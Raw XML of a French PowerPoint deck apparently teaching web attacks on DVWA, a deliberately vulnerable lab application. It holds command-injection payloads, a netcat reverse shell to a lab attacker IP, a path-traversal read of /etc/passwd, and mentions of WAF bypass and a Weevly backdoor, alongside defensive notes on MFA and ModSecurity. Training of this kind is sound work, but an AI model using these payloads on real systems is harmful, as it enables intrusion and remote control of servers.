        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3757039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Protection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Authentification (utilisation de MFA par 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>somethings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> know, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> have, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> are)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilisation de ORM ou DBOO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1208626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E2AEC-590F-6CF0-AEC5-F57DDE32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WAF (Installation dans le server)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5FB3B0-B92C-B7CC-59AF-CEEF587BD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8" y="1825625"/>
            <a:ext cx="11709918" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.linuxbabe.com/security/modsecurity-apache-debian-ubuntu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://kifarunix.com/install-modsecurity-with-apache-on-ubuntu-22-04/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Tester : 127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>index.html?exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>=/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>bash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Google key : « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> + WAF »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sur un serveur VPS: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https//www.digitalocean.com/community/tutorials/apache-configuration-error-ah00558-could-not-reliably-determine-the-server-s-fully-qualified-domain-name </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1895361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WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>byPASS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875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RESUMES EXPLOITATION DE VULNERABILITES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999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03DB08-2809-6EA6-6783-EA7396FE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de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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5FA6B2-16CA-84A7-ACCA-B23C486F2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https://0xsp.com/offensive/red-teaming-toolkit-collection/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://arfortech.wordpress.com/2019/09/01/hacking-tools-list-you-should-know/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/NetW0rK1le3r/PENTESTING-BIBLE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9619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78C22C-693E-3950-9843-C530245D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C4D461-0EF7-FD72-5C6C-B846A8A35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6282" cy="482710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dirty="0"/>
              <a:t>https://www.youtube.com/@_CryptoCat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@formationenligne2648/videos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/HackerSploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@NetworkChuck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@informatrixsecuriteinforma6057</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@_JohnHammond</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@LoiLiangYang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@Cyber_Sudo/videos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@zanidd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@MotasemHamdan/videos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@DarkSec/videos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@InfoSecPat/videos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@EthicalHackingFormation/videos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@LoiLiangYang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@GDNetworkingNewbie/videos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.youtube.com/@davidbombal</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0F0F0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HacktBack</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0F0F0F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fr-FR">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F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Trackflaw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20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DVWA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43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Brute Force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Commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>wfuzz</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilisation de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (à faire)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83108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 injection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Regarder OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>En back end tester : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ping –c4 127.0.0.1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Utilisation de pipe : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ping –c4 127.0.0.1 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ls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447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 INJECTION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741024" cy="416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1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LOW LEVEL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>PIPE : | ou || ou &amp; ou &amp;&amp; ou ;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127.0.0.1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>127.0.0.1; cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>127.0.0.1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>,,/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>127.0.0.1 &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hacked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8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LOW LEVEL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>revershell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la machine attaquant : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 1337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Sur l’entrée de la fenêtre web :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127.0.0.1 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -e /bin/sh 192.168.32.130 1337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Que se passe t-il pour medium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security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43967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LOCAL FILE INCLUSION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http://192.168.80.134/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/fi/?page=../../../../../../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passwd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Comment faire avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>????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76283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1240</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>192</Paragraphs>
  <Slides>27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Roboto</vt:lpstr>
      <vt:lpstr>Thème Office</vt:lpstr>
      <vt:lpstr>OWASP INJECTION (DVWA) </vt:lpstr>
      <vt:lpstr>Version antérieure </vt:lpstr>
      <vt:lpstr>DVWA</vt:lpstr>
      <vt:lpstr>Brute Force</vt:lpstr>
      <vt:lpstr>Commande injection</vt:lpstr>
      <vt:lpstr>COMMAND INJECTION</vt:lpstr>
      <vt:lpstr>LOW LEVEL PIPE : | ou || ou &amp; ou &amp;&amp; ou ;</vt:lpstr>
      <vt:lpstr>LOW LEVEL (netcat revershell)</vt:lpstr>
      <vt:lpstr>LOCAL FILE INCLUSION</vt:lpstr>
      <vt:lpstr>ACTIVATION RFI</vt:lpstr>
      <vt:lpstr>RFI</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>FILE UPLOAD AVEC WEEVLY BACKDOOR</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>AUTRES INJECTION</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection DVWA</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL INJECTION AMELIORATION</vt:lpstr>
      <vt:lpstr>Protection </vt:lpstr>
      <vt:lpstr>WAF (Installation dans le server)</vt:lpstr>
      <vt:lpstr>WAF byPASS</vt:lpstr>
      <vt:lpstr>RESUMES EXPLOITATION DE VULNERABILITES</vt:lpstr>
      <vt:lpstr>Outils de Pentest : </vt:lpstr>
      <vt:lpstr>Webographies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ET DVWA</dc:title>
  <dc:creator>pi</dc:creator>
  <cp:lastModifiedBy>Sitraka</cp:lastModifiedBy>
  <cp:revision>35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-30T12:59:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-13T08:44:20Z</dcterms:modified>
</cp:coreProperties>
</file>